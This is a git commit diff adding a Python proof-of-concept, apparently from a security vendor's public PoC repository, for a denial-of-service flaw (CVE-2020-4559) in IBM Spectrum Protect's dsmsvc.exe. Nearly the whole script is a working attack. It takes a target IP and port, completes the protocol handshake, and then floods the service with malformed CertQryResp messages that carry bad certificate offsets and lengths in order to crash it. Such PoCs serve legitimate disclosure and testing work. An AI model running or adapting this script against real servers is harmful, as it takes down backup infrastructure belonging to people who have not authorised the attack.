Merge branch 'master' of github.com:tenable/poc

Author: katiesexton

ibm/spectrum_protect/ibm_spectrum_protect_CertQryResp_dos_CVE-2020-4559.py

@@ -0,0 +1,139 @@
+import sys, argparse, struct, socket 
+
+# Got it from the Internet
+def ordp(c):
+    output = []
+    for i in c:
+        if (i < 32) or (i >= 127):
+            output.append('.')
+        else:
+            output.append(chr(i))
+    return ''.join(output)
+
+# Got it from the Internet
+def hexdump(t,p):
+    print("---[ %s ]---" % (t))
+    output = []
+    l = len(p)
+    i = 0
+    while i < l:
+        output.append('{:04x}   '.format(i))
+        for j in range(16):
+            if (i + j) < l:
+                byte = p[i + j]
+                output.append('{:02X} '.format(byte))
+            else:
+                output.append('   ')
+            if (j % 16) == 7:
+                output.append(' ')
+        output.append('  ')
+        output.append(ordp(p[i:i + 16]))
+        output.append('\n')
+        i += 16
+    print(''.join(output))
+
+
+def send_verb(s, type, data):
+  dlen = len(data)
+  if type < 0x100:
+    header = struct.pack('>HBB', dlen + 4, type, 0xA5)
+  else:
+    header = struct.pack('>HBBLL', 0, 8, 0xA5, type, dlen + 12)
+  
+  #hexdump('verb 0x%X req' % (type), header + data)
+  s.sendall(header + data) 
+
+def recv_verb(s):
+  hdr1 = s.recv(4)
+  (verbLen, verbType, magic) = struct.unpack('>HBB', hdr1)
+  if magic != 0xA5:
+    raise ValueError('Magic in header is not 0xA5')
+ 
+  hdrLen = 4 
+  if verbType == 8:
+    hdr2 = s.recv(8)
+    (verbType, verbLen) = struct.unpack('>LL', hdr2)
+    hdrLen = 12
+  else:
+    hdr2 = b''
+
+  if verbLen < hdrLen:
+    raise ValueError('Invalid verbLen %d ' % (verbLen))
+  bodyLen = verbLen - hdrLen 
+      
+  if bodyLen > 0:
+    data = s.recv(bodyLen)
+  else: 
+    data = b''
+
+  #hexdump('verb 0x%X res' % (verbType), hdr1 + hdr2 + data)
+  return {'verbType':verbType, 'verbData': data}
+     
+#
+# MAIN
+#
+desc = 'This PoC attempts to terminate dsmsvc.exe.'
+
+arg_parser = argparse.ArgumentParser(desc)
+arg_parser.add_argument('-t', required=True, help='Target IP (Required)')
+arg_parser.add_argument('-p', type=int, default=1500, help='dsmsvc.exe port, default: %(default)s')
+
+args = arg_parser.parse_args()
+host = args.t
+port = args.p
+
+id = b'A' * 0x10
+supportedMethods = 0x8000000
+idType = 4 
+sessType = 0xe
+sslMode  = 2
+
+negotiate  = struct.pack('B', 1)
+negotiate += struct.pack('>H', 0x1b)
+negotiate += struct.pack('>L', supportedMethods)
+negotiate += struct.pack('>H', sslMode)
+negotiate += struct.pack('>H',0)
+negotiate += struct.pack('>H',len(id))
+negotiate += struct.pack('B', idType)
+negotiate += struct.pack('B', sessType)
+negotiate += id 
+
+conns = 0;
+for i in range(1000):
+  for certSize in range(0x200, 0x10000, 0x100):
+    for certOffset in range(0x1000, 0x10000, 0x1000):
+      s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+      s.connect((host, port))
+
+      # Send Identify
+      send_verb(s,0x1D, b'')
+      r = recv_verb(s)
+      if r['verbType'] != 0x1E: 
+        print('Received verb not IdentifyResp')
+        s.close()
+        sys.exit(1)
+
+      # Send Negotiate 
+      send_verb(s, 0x3E0000, negotiate)
+      r = recv_verb(s)
+      if r['verbType'] != 0x3E0010:
+        print('Received verb not NegotiateResp')
+        s.close()
+        sys.exit(1)
+
+      # Send CertQryResp
+      conns = conns + 1
+      print('connection %08d: certSize %08x, certOffset %08x' % (conns, certSize, certOffset)) 
+
+      cert = b'C' * certSize
+      CertQryResp  = struct.pack('B', 1)
+      CertQryResp += struct.pack('>H', 0x17 + certSize - 1) # dataOffset
+      CertQryResp += struct.pack('>H', 0)    # opRC
+      CertQryResp += struct.pack('>H', 1)    # certFormat
+      CertQryResp += struct.pack('>H', certOffset)  # certOffset
+      CertQryResp += struct.pack('>H', 0xffff)      # certLength
+      CertQryResp += cert 
+
+      send_verb(s, 0x31900, CertQryResp)
+      s.close()
+